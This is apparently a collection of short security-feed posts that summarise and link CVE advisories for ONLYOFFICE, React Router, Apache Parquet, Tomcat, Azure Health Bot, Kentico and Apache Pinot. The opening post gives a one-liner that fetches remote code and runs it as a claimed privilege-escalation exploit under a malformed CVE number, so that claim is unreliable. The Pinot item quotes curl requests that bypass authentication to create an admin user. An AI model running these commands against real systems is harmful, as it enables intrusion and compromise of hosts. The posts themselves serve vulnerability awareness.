💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL https://thc.org/7350pipe)”

Linux kernel: CVE-2024-57882 fix did not prevent data stream corruption in the MPTCP protocol

https://seclists.org/oss-sec/2025/q2/0

this 11yo CVE aged well

https://www.phpsecure.info/CVE-2014-0401.html

#PHP #CVE #CurrencyVulnerability

Researchers, you don't need to be this patient. Just publish that shit.

https://medium.com/@mihat2/onlyoffice-document-server-path-traversal-fdd573fec291

Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.

• October 10, 2023 – The moment I realized the flaw was real, I immediately reached out to ONLYOFFICE’s security team. To my surprise, they responded the same day! To ensure they had all the details, I sent them a thorough PDF report outlining the vulnerability, complete with technical analysis, proof-of-concept, and potential impact. I thought this was going to be a smooth disclosure process — how wrong I was.
• October 11 — November 19, 2023 — I followed up. Again. And again. Silence. Maybe my emails were lost? Maybe they were ignoring me? Either way, weeks passed, and still — no response.
• November 20, 2023 – We submitted the vulnerability to HackerOne, hoping to reach the ONLYOFFICE through another channel.
• December 4, 2023 – With no response from HackerOne, we escalated the report to HackerOne Disclosure Assistance, but STILL received no response.
• February 19, 2024 – ONLYOFFICE finally responded, stating that they were working on a fix.
• February 26, 2024 – ONLYOFFICE released a fix for the vulnerability.
• April 1, 2024 – ONLYOFFICE informed us that while the fix was available, some products would not receive the security patch until Summer 2024. They requested that we delay public disclosure until July 2024.
• February 21, 2025 – HackerOne Disclosure Assistance responded, stating that they were reviewing the backlog and asked for an update on the current situation.

https://nvd.nist.gov/vuln/detail/CVE-2023-46988

Simple and practical vulns like this are always nice to read about and learn from and replicate.

https://github.com/remix-run/react-router/security/advisories/GHSA-4q56-crqp-v477

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-31137

And we have a perfect 10 in Apache Parquet, whatever that is. 🥳

sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code

Users are recommended to upgrade to version 1.15.1, which fixes the issue.

https://nvd.nist.gov/vuln/detail/CVE-2025-30065

Looks like CISA is now satisfied and has added CVE-2025-24813 (Apache Tomcat Path Equivalence Vulnerability ) to the KEV Catalog.

Another Microsoft cloud service vuln got patched. They claim no exploitation and it wasn't publicly known so you should be okay but that trust thing is hard.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21384

sev:HIGH 8.3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

An authenticated attacker can exploit an Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-21384

I know that many of us tend to scoff at XSS vulns, but it's good to be reminded how they can be successfully used in a chain for something more interesting.

https://labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/

I don't know Apache Pinot but this seems like a good one to keep in your back pocket.

https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

https://nvd.nist.gov/vuln/detail/CVE-2024-56325